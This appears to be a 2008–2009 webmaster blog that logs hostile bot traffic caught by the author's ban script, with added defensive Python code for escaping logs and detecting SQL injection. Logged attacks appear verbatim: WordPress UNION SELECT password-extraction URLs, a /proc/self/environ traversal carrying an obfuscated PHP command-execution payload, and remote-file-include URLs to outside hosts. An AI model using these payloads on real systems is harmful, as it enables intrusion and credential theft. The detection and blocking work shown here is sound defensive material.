Jun 30, 2009

wrangler.websitewelcome.com bot

Agent: -NO AGENT-
74.52.200.178 wrangler.websitewelcome.com

Just what is this bot? It doesn't send a user agent, and the website websitewelcome.com has no information on it, just an email contact address.

websitewelcome.com added to the block list.

useragent spammer www.ongarofrancesco.org

Agent: (a href="http://www.ongarofrancesco.org">Independent Security Researcher(/a> Independent Security Researcher(/a>" target=\_BLANK">
79.45.39.47 host47-39-dynamic.45-79-r.retail.telecomitalia.it

This bot tries to spam the user-agent logs that some sites publish, seeding them with links to a website at www.ongarofrancesco.org.

This looks to be some hacker reference site. The bot is from Italy.

This just goes to show why you should not have scripts on your site that publish the user agents you have logged: they can contain HTML.
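As an added example (not code from this blog or from mmautoban), here is how a log-display script can publish logged user agents without the HTML in them taking effect, and flag the entries that carry markup. The log excerpt is constructed in the two-line "Agent:" / "ip hostname" format used above; the spammer's agent has the angle brackets restored that the post shows as parentheses, and the crawler.example.invalid entry is invented.

```python
import html
import re

# Constructed log excerpt in the "Agent:" / "ip hostname" pair format used on
# this page. The first agent is the spammer's (angle brackets restored); the
# second is the wrangler.websitewelcome.com entry; the third is invented.
SAMPLE_LOG = """\
Agent: <a href="http://www.ongarofrancesco.org">Independent Security Researcher</a>
79.45.39.47 host47-39-dynamic.45-79-r.retail.telecomitalia.it
Agent: -NO AGENT-
74.52.200.178 wrangler.websitewelcome.com
Agent: Mozilla/5.0 (compatible; examplebot/1.0; +http://example.invalid/bot)
192.0.2.10 crawler.example.invalid
"""

# Characters and tokens that have no business in a user-agent string and would
# render as markup or script if the log were published raw.
MARKUP_RE = re.compile(r"""[<>"']|&#|%3c|%3e|javascript:""", re.IGNORECASE)


def parse_log(text):
    """Return (user_agent, ip, hostname) tuples from the two-line entry format."""
    lines = [line for line in text.splitlines() if line.strip()]
    entries = []
    for i in range(0, len(lines) - 1, 2):
        agent_line, addr_line = lines[i], lines[i + 1]
        ua = agent_line[len("Agent: "):] if agent_line.startswith("Agent: ") else agent_line
        ip, _, host = addr_line.partition(" ")
        entries.append((ua, ip, host))
    return entries


def looks_like_markup(ua):
    """Flag a user agent that carries HTML or script fragments (a log spammer, or worse)."""
    return MARKUP_RE.search(ua) is not None


def render_table(entries):
    """Render entries as HTML with every field escaped, so a logged UA cannot inject markup."""
    rows = []
    for ua, ip, host in entries:
        css = ' class="suspect"' if looks_like_markup(ua) else ""
        rows.append(
            f"<tr{css}><td>{html.escape(ip)}</td><td>{html.escape(host)}</td>"
            f"<td>{html.escape(ua)}</td></tr>"
        )
    return "<table>\n" + "\n".join(rows) + "\n</table>"


if __name__ == "__main__":
    print(render_table(parse_log(SAMPLE_LOG)))
```

The escaping is what actually neutralises the spammer's link; the markup flag is only there so the entry stands out for review. Note that the hostname and IP are escaped too, since reverse-DNS names are attacker-controlled data as well.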

Jun 24, 2009

IE 8 breaks subdomains making them hard to read using domain highlighting

Domain Highlighting in Internet Explorer 8 (IE8) now blanks the subdomain and following text after the domain.



This is nuts: it makes this site read blogger.com and you cannot see the subdomain. Whose lame idea is this? It's one thing to make the main domain a different color; it's another to hide the entire URL.

Someone has to find a way around this. There must be some way to highlight the URL bar using Java so the subdomain will be visible, or some way to force IE8 into IE7 mode. We own our subdomains and M$ has no right to blank them out. They are part of our domain names and part of our keyword usage.


This has to be fixed.

Microsoft is taking away our legal use of subdomains.
Websites that use subdomains are not crooks; we are legally using one domain to create many websites. Just because some crook used a subdomain, they should not all be hidden.


ZDNet says IE8 puts dimwits ahead of the tech savvy.

aidanwalsh.net says

why do you have to obfuscate the rest of the URL information by default? No part of a URL is irrelevant, and information contained in URLs is becoming more and more relevant as time goes on (logically structured URLs, URL based identity management, etc). Why do I need to hold my mouse over the address bar to be able to see this? Surely there are better ways to emphasise the domain block of the URL? Embolden it. Change the colour of the domain, not the rest of the URL.



domain highlighting, ie 8 domain name greyed out, ie8 address bar subdomain, ie8 subdomains broken, making the subdomain visible in ie8

Jan 20, 2009

strange code on wp blog detected

mmautoban has detected the following code being used on a WP blog.

Anyone know what this is?

/functionnumber-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20index%20=%20-number-%20slices%20=%20-%20array%20=%20this.toArray;%20%20%20%20while%20index%20+=%20number%20%20array.length%20%20%20%20%20%20slices.pusharray.sliceindex-%20index+number;%20%20%20%20return%20slices.collectiterator-%20context;%20%20

/functionfilter-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20results%20=%20;%20%20%20%20if%20Object.isStringfilter%20%20%20%20%20%20filter%20=%20new%20RegExpfilter;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20if%20filter.matchvalue%20%20%20%20%20%20%20%20results.pushiteratorvalue-%20index;%20%20%20%20;%20%20%20%20return%20results;%20%20

/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20=%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20


/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20 GET

/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20trues%20=%20-%20falses%20=%20;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20iteratorvalue-%20index%20?%20%20%20%20%20%20%20%20trues%20:%20falses.pushvalue;%20%20%20%20;%20%20%20%20return%20trues-%20falses;%20%20



/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator.bindcontext;%20%20%20%20return%20this.mapfunctionvalue-%20index%20%7B%20%20%20%20%20%20return%20%7Bvalue:%20value-%20criteria:%20iteratorvalue-%20index%7D;%20%20%20%20%7D.sortfunctionleft-%20right%20%7B%20%20%20%20%20%20var%20a%20=%20left.criteria-%20b%20=%20right.criteria;%20%20%20%20%20%20return%20a%20%3C%20b?%20-1%20:%20a%20%20b%20?%201%20:%200;%20%20%20%20.pluckvalue;%20%20



%20null%20:%20fillWith;%20%20%20%20return%20this.eachSlice(number-%20function%20(slice)%20{while%20(slice.length%20%3C%20number)%20{slice.push(fillWith);}return%20slice;});}


It has about 15 other versions. I suspect it is some type of attack, unless some plugin is malfunctioning.
Anyone have any info on what this code is?

Jan 15, 2009

OSCommerce mods

OScommerce Notes
===============
A rare bug has been detected with osCommerce. If the customer does not select a payment method at checkout, the browser is redirected to

/checkout_payment.php?error_message=Please+select+a+payment+method+for+your+order

The +select+ in that query string triggers an injection-hack detection in mmautoban.
To prevent this, edit your osCommerce english.php file and change the error message from
"Please Select" to "Please Pick";
this will stop customers from getting banned.
It is unknown whether other such messages exist in other places or in other programs.
If you see any, please report them.

Dec 3, 2008

'mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol' wordpress hacker

Just detected this hacker. The IP is blocked by no-more-funn.moensted.dk.

What is this useragent? (k1b compatible; rss 6.0; windows sot 5.1 security kol)

www._____.com/index.php?cat=%2527+UNION+SELECT+CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))+FROM+wp_users+where+id=1/*
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

www._____.com/index.php?cat=999+UNION+SELECT+null-CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))-null-null-null+FROM+wp_users+where+id=1/*
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

www._____.com/wp-trackback.php?p=1
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

www.____.com/xmlrpc.php
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38
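The osCommerce post above (Jan 15) and this one show the two sides of the same detection problem: a check that fires on the bare word "select" bans a customer who merely failed to pick a payment method, while the wp_users probes logged here carry real SQL structure. As an added example (not mmautoban's code), the check below decodes each query parameter and looks for that structure instead; the request lines are the ones shown on this page, and the allowlist of (path, parameter) pairs is a hypothetical alternative to rewording english.php.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Request lines taken from this page: the osCommerce redirect that mmautoban
# flagged (a false positive) and the wp_users probes exactly as logged
# (hosts were already masked on the page; only path+query is used here).
OSC_REDIRECT = "/checkout_payment.php?error_message=Please+select+a+payment+method+for+your+order"
WP_PROBES = [
    "/index.php?cat=%2527+UNION+SELECT+CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))+FROM+wp_users+where+id=1/*",
    "/index.php?cat=999+UNION+SELECT+null-CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))-null-null-null+FROM+wp_users+where+id=1/*",
    "/wp-trackback.php?p=1",
    "/xmlrpc.php",
]

# Structural SQL markers rather than the bare word "select": a UNION SELECT,
# a SELECT ... FROM clause, CHAR() obfuscation, or a MySQL comment opener.
SQLI_RE = re.compile(
    r"\bunion\s+(?:all\s+)?select\b"
    r"|\bselect\b[^;]{0,200}?\bfrom\b"
    r"|\bchar\s*\("
    r"|/\*",
    re.IGNORECASE,
)

# Hypothetical allowlist of (path, parameter) pairs whose values are fixed
# site messages and never reach a database query.
BENIGN_PARAMS = frozenset({("/checkout_payment.php", "error_message")})


def naive_is_injection(request):
    """The kind of check that bans the osCommerce customer: any 'select' anywhere."""
    return re.search(r"select", unquote_plus(request), re.IGNORECASE) is not None


def is_injection(request, allow=BENIGN_PARAMS):
    """Decode each parameter (a second time, to undo %2527-style double encoding)
    and look for SQL structure, skipping allowlisted parameters."""
    path, _, query = request.partition("?")
    for name, value in parse_qsl(query, keep_blank_values=True):
        if (path, name) in allow:
            continue
        if SQLI_RE.search(unquote_plus(value)):
            return True
    return False


def triage(requests):
    """Return the subset of requests the structural check flags, order preserved."""
    return [r for r in requests if is_injection(r)]


if __name__ == "__main__":
    print("naive flags redirect:", naive_is_injection(OSC_REDIRECT))
    print("structural flags redirect:", is_injection(OSC_REDIRECT))
    print("flagged probes:", triage(WP_PROBES))
```

The structural check alone already passes the "Please select a payment method for your order" redirect, because there is no FROM clause; the allowlist is the second layer for a message that does happen to read like SQL (say, "select a method from the list"), which the test exercises. Double-decoding matters: the first probe hides its quote as %2527, which only becomes a quote after two passes.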

Nov 20, 2008

babycaleb.mvhosted.com hacker attacks

Baby hacker has moved to http://babycaleb.mvhosted.com

And his baby bots are now trying to inject this new URL into websites.
The site, when inspected using Sam Spade to avoid any virus infection, shows the exploit is in the HTML just like before.

A search shows it has infected many websites. http://www.google.com
Parsing input: http://babycaleb.mvhosted.com
Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178
host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)
Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178
host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)
Routing details for 74.53.187.178
Cached whois for 74.53.187.178 : abuse@theplanet.com
Using abuse net on abuse@theplanet.com
abuse net theplanet.com = abuse@theplanet.com
Using best contacts abuse@theplanet.com


Send abuse messages to theplanet.com.

Nov 12, 2008

itsapic.com/crawler.html another beta

208.43.85.166
Required header 'Accept' missing GET / HTTP/1.0
User-Agent: Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)
Connection: close
Referer: http://u.webring.com/hub?ring=xxxxxxxxxxxxxxxx


This bot was scanning WebRing looking for sites and got blocked by BB, so watch for it.
The website does not say what the bot is doing or ask permission to enter your site.


Add to robots.txt:
User-agent: itsapic.com_crawler
Disallow: /

Nov 8, 2008

babycaleb.fortunecity.co.uk hacker now shut down.

Am getting a lot of these requests lately

/shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm

They are from lots of IPs, all trying to remotely load this page. Inside that page is a hack attempt. AVG gives an alarm if you try to view the source.

Do not go to the website babycaleb.fortunecity.co.uk. AVG detects a virus, but it still gets into your system. Look for
c:\windows\system32\tools\regexe.exe
a trojan horse, downloader.generic8.cox

--updated--
The site has now been shut down.

A Google search
http://www.google.com/search?q=babycaleb.fortunecity.co.uk shows that sites all over the net are infected with this attack and are allowing it to spread. Perhaps they are involved in the attack?

Sep 11, 2008

serverkompetenz.net Hackers

serverkompetenz.net is a hacker, not a spambot.

.com/nuke/index.php?k=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ GET HTTP/1.1
Agent:

 $x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x10="\x66\x72ea\x64"; $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x12="i\163\x5f\162\x65s\157ur\x63\x65"; $x13="\152\157\x69\156"; $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73"; $x15="ob\137\x65\156d\137\x63lea\156"; $x16="\x6fb_st\x61\x72\164"; $x17="\x70\141\163s\164\x68\162\165"; $x18="\x70\143\154ose"; $x19="p\157\160e\x6e"; $x1a="\163h\145\154l\137\x65\170e\143"; $x1b="\x73\x79s\x74e\x6d"; function x0b($x0b){ global $x0e-$x0f-$x10-$x11-$x12-$x13-$x14-$x15-$x16-$x17-$x18-$x19-$x1a-$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b-$x0c);$x0c = $x13("\n"-$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b-"\x72"))){ $x0c = ""; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d-1024); } @$x18($x0d);} } return $x0c;}echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");


81.169.152.101 h986442.serverkompetenz.net

The bot attempted to include a script in place of its user-agent string.

It then tried to remote load a script.
Blacklist Domain Ban: serverkompetenz.net
.com/nuke/index.php?k=http://www.jfc.info/jfcinfo/grafiken/i??? GET HTTP/1.1
Agent: http://cr4nk.ws/ [de] (windows 3.1; i) [crank]
81.169.152.101 h986442.serverkompetenz.net

Aug 22, 2008

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST

The latest hack running right now is an injection attempt using a string like this.

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C----removed----%20AS%20CHAR(4000));EXEC(@S);

This is a bot attack and is coming from everywhere.
They come in two at a time from the same IP.

They are trying to inject code into your site to display an iframe that will take people to another site. It doesn't look like they are attacking PHP; they are attacking ASP, ColdFusion and Perl. See more here: isc.sans.org

Also see this post, which recommends:


RewriteCond %{REQUEST_URI} ^(.*)CAST(.*) [OR]
RewriteCond %{REQUEST_URI} ^(.*)DECLARE(.*) [NC,OR]

But a better page on how to block this with .htaccess is located here.


They are also scanning for a delay in the page response, so any script that sleeps when it detects a hack must have the sleep removed, or they will come back and hit you harder.


Just the hits will bring your server down if you try to ban all the IPs being used, so I have modified the hacker modules.

Update hacker modules Here.




You will also want to download your databases and scan them for IFRAMEs and JavaScript.
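As an added example (not the blog's hacker module and not code from the .htaccess page it links to), the check below does in Python what the two RewriteCond lines above try to do, but on the decoded query string and requiring both the DECLARE and the CAST(0x...) halves, and it decodes the hex literal so you can see what the bot was trying to run. The first request is the string logged on this page, whose hex body the author redacted; the two complete samples are constructed, their hex being nothing more than the marker text "CONSTRUCTED SAMPLE PAYLOAD", once as CHAR (single-byte) and once as NVARCHAR (UTF-16LE). The `/page.asp?id=1;` prefix is likewise constructed.

```python
import re
from urllib.parse import unquote_plus

# The injection string as logged on this page (hex body redacted by the author)
# plus two constructed complete samples whose hex encodes only a marker string.
PAGE_SAMPLE = ("/page.asp?id=1;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST("
               "0x4445434C----removed----%20AS%20CHAR(4000));EXEC(@S);")
MARKER = "CONSTRUCTED SAMPLE PAYLOAD"
CHAR_SAMPLE = ("/page.asp?id=1;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
               + MARKER.encode("ascii").hex().upper()
               + "%20AS%20CHAR(4000));EXEC(@S);")
NCHAR_SAMPLE = ("/page.asp?id=1;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
                + MARKER.encode("utf-16-le").hex().upper()
                + "%20AS%20NVARCHAR(4000));EXEC(@S);")

# Both halves of the pattern must be present, in order, so a path that merely
# contains the word "cast" (e.g. /products.asp?category=broadcast) is not blocked.
DECLARE_CAST_RE = re.compile(
    r"\bDECLARE\s+@\w+\s+N?(?:VAR)?CHAR\s*\(.*?\bCAST\s*\(\s*0x[0-9A-Fa-f]+",
    re.IGNORECASE | re.DOTALL,
)
HEX_RE = re.compile(r"\bCAST\s*\(\s*0x([0-9A-Fa-f]+)", re.IGNORECASE)


def is_declare_cast(request):
    """True when the decoded request carries the DECLARE ... CAST(0x...) shape."""
    return DECLARE_CAST_RE.search(unquote_plus(request)) is not None


def decode_cast_hex(hex_digits):
    """Turn the 0x... literal back into text. If every second byte is zero the
    literal was built for an N*CHAR cast and is UTF-16LE; otherwise single-byte."""
    if len(hex_digits) % 2:
        hex_digits = hex_digits[:-1]  # a truncated literal still decodes partially
    raw = bytes.fromhex(hex_digits)
    if len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def extract_cast_payload(request):
    """Return the decoded SQL hidden in the CAST, or None when the request is not this attack."""
    if not is_declare_cast(request):
        return None
    m = HEX_RE.search(unquote_plus(request))
    return decode_cast_hex(m.group(1)) if m else None


if __name__ == "__main__":
    for req in (PAGE_SAMPLE, CHAR_SAMPLE, NCHAR_SAMPLE):
        print(is_declare_cast(req), repr(extract_cast_payload(req)))
```

Two things the RewriteCond lines above do not handle, and which a practitioner should check before relying on them: in mod_rewrite `%{REQUEST_URI}` is the path only and does not include the query string, so a condition that is meant to see the injected SQL has to test `%{QUERY_STRING}` as well; and `^(.*)DECLARE(.*) [NC]` matches the word anywhere in a path, so an ordinary URL containing "declare" would be blocked. The decoder is for triage: the four hex digits that survive on this page decode to "DECL", i.e. the injected string itself starts with another DECLARE.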

Aug 6, 2008

magnum.liquidweb.com hacker

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322)
64.91.248.2 magnum.liquidweb.com
string=[ feed=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F ]
The hacker hits with this string, trying to get my server to run his scripts.

Then, after getting banned, he keeps trying with this set of scripts.

?feed=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Fzagu%2F
p=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fomoj%2Femuqir%2F

They are all scripts used by hackers to display a test message on your server:
http://chyngachanga.ru/content/wuge/owofi/
http://www.qubestunes.com/treytest/1/adoyuru/zagu/
http://www.heaven-house.kz/templates_c/omoj/emuqir/

Jun 30, 2008

After banning the domain amazonaws.com because they are hosting bots,
I get all of this.

Agent: webclient
75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com
Agent: webclient
75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322)
67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com

Agent: Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com-crawl@powerset.com]
72.44.49.121 ec2-72-44-49-121.z-1.compute-1.amazonaws.com

Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.34.44 ec2-67-202-34-44.compute-1.amazonaws.com


-----Update: AideRSS just does not get that they have been blocked.
67.202.23.122 ec2-67-202-23-122.compute-1.amazonaws.com
[06-17-2008-16:07:52] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.226.160 ec2-75-101-226-160.compute-1.amazonaws.com
[06-17-2008-16:09:04] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.219.174 ec2-75-101-219-174.compute-1.amazonaws.com
[06-17-2008-16:09:19] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.21.42 ec2-67-202-21-42.compute-1.amazonaws.com
[06-17-2008-16:09:22] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.23.83 ec2-67-202-23-83.compute-1.amazonaws.com
[06-17-2008-16:09:29] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.211.7 ec2-75-101-211-7.compute-1.amazonaws.com
[06-17-2008-16:09:35] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.244.65 ec2-75-101-244-65.compute-1.amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.61.94 ec2-67-202-61-94.compute-1.amazonaws.com


Update

67.202.31.132 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.61.94 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.23.83 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.21.42 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.23.122 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.34.44 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.57.15 is BLACKLISTED by dnsbl.njabl.org for spam


The following comment is associated with this record: This network is a member of a dynamic hosting environment. See http://ec2.amazonaws.com/
It was added to the list: Tue Apr 1 12:41:39 2008 EST

spam source means the system was found via manual spam header parsing to be the origin of spam.

Update July 15th
Agent: firefox/2.0.0.6 (ubuntu-feisty)
72.44.48.95 ec2-72-44-48-95.compute-1.amazonaws.com
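The two mechanisms this post leans on are a domain ban applied to the reverse-DNS name (the "Scan Blacklist Domain Ban: amazonaws.com" lines) and a DNSBL lookup (the njabl listings). As an added example, not mmautoban's code, the functions below implement both: a suffix match that only fires on a label boundary, so a look-alike such as notamazonaws.com is not caught, and the reversed-octet query name a DNSBL lookup sends. The "ip hostname" lines are a constructed excerpt modelled on the log above, with one invented non-EC2 host and one look-alike added. dnsbl.njabl.org is the zone the page cites; it has since been retired, so substitute a live zone if you use the network lookup.

```python
import ipaddress
import socket

# Domains the page reports banning outright (matched as hostname suffixes).
BANNED_DOMAINS = frozenset({"amazonaws.com", "websitewelcome.com", "serverkompetenz.net"})

# Constructed "ip hostname" lines modelled on the entries on this page, plus
# one non-EC2 host and one that only looks like a match.
SAMPLE_HOSTS = """\
75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com
67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com
192.0.2.7 crawler.example.invalid
192.0.2.8 notamazonaws.com
"""


def host_matches_ban(hostname, banned=BANNED_DOMAINS):
    """True when hostname is a banned domain or a subdomain of one.
    The comparison is on a label boundary, so notamazonaws.com is not caught."""
    h = hostname.lower().rstrip(".")
    return any(h == d or h.endswith("." + d) for d in banned)


def banned_ips(text, banned=BANNED_DOMAINS):
    """Unique IPs in the log whose reverse-DNS name falls under a banned domain, sorted numerically."""
    hits = set()
    for line in text.splitlines():
        ip, _, host = line.partition(" ")
        if host and host_matches_ban(host, banned):
            hits.add(ip)
    return sorted(hits, key=ipaddress.IPv4Address)


def dnsbl_query_name(ip, zone):
    """Name queried for a DNSBL lookup: octets reversed, zone appended
    (67.202.31.132 -> 132.31.202.67.<zone>)."""
    addr = ipaddress.IPv4Address(ip)  # raises ValueError on a malformed address
    return ".".join(reversed(str(addr).split("."))) + "." + zone


def dnsbl_lookup(ip, zone):
    """Return the 127.0.0.x answer when the IP is listed, None when it is not.
    Needs network access, so it is not exercised in the offline test."""
    try:
        return socket.gethostbyname(dnsbl_query_name(ip, zone))
    except socket.gaierror:
        return None


if __name__ == "__main__":
    print("banned:", banned_ips(SAMPLE_HOSTS))
    print("query name:", dnsbl_query_name("67.202.31.132", "dnsbl.njabl.org"))
```

A hostname-suffix ban is only as trustworthy as the reverse DNS it reads: the name comes from the PTR record under the sending network's control, so a forward lookup of that name (confirming it resolves back to the same IP) is worth adding before acting on it.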

Jun 25, 2008

AVG v8 Site Advisor tracking

Have started experimental tracking of the AVG bandwidth hog (malware).

Tracking logs show that each user loads a page 3 to 6 times; the last one attacked my system 23 times.

The following users were caught running this abusive bot. Users running this
bot are warned that it conducts a DoS attack on the websites they view on a Google results page, and that they are in violation of ISP abuse rules by running it.

It also causes your computer to visit every site on the Google results pages, including porn, so they may get in trouble at work for using this thing.


218.111.223.48 06-24-2008-18:45:45 48.223.111.218.kmr03-home.tm.net.my AVG _ _ 3
74.12.128.183 06-24-2008-19:14:03 74.12.128.183 AVG _ _ 6
67.32.230.107 06-24-2008-20:21:05 adsl-32-230-107.bct.bellsouth.net AVG _ _ 3
64.150.130.236 06-24-2008-20:42:24 236.64-150-130-net.sccoast.net AVG _ _ 3
74.197.112.161 06-24-2008-22:20:52 74.197.112.161 AVG _ _ 6
98.224.47.121 06-24-2008-23:22:42 c-98-224-47-121.hsd1.fl.comcast.net AVG _ _ 3
71.3.48.53 06-24-2008-23:51:47 fl-71-3-48-53.dhcp.embarqhsd.net AVG _ _ 3
124.179.217.189 06-24-2008-23:56:19 CPE-124-179-217-189.vic.bigpond.net.au AVG _ _ 3
24.57.41.30 06-25-2008-01:49:43 d57-41-30.home.cgocable.net AVG _ _ 2
85.104.112.83 06-25-2008-07:11:37 dsl85-104-28755.ttnet.net.tr AVG _ _ 3
213.55.74.13 06-25-2008-07:38:17 213.55.74.13 AVG _ _ 3
24.14.133.88 06-25-2008-12:46:30 c-24-14-133-88.hsd1.il.comcast.net AVG _ _ 3
200.97.12.91 06-25-2008-12:49:01 200.97.12.91 AVG _ _ 6
74.138.198.171 06-25-2008-13:56:31 74-138-198-171.dhcp.insightbb.com AVG _ _ 6
76.67.42.200 06-25-2008-15:47:47 bas21-toronto12-1279470280.dsl.bell.ca AVG _ _ 23

Jun 17, 2008

AVG users now being blocked by BB

AVG users using site search are setting off bot alarms, and
Bad Behavior is rejecting the visitors.

The bot visits every page you see on a search results page and tries to scan them.
This is overloading everyone's servers, and BB detects it because it is a broken bot that sends incorrect headers.

Once blocked by BB, if logging is turned on, the user will be unable to visit the site and will get an error.

Worse yet, AVG doesn't understand the error page BB sends and reports the site as safe, making the scanner useless, because all a hacker has to do is display a safe page to AVG.

So if you want to block this, BB will do it, and so will my script. But if you're running a blog and you don't want the visitors blocked, you need to turn off logging.


Users running MMAUTOBAN: download the upgrade.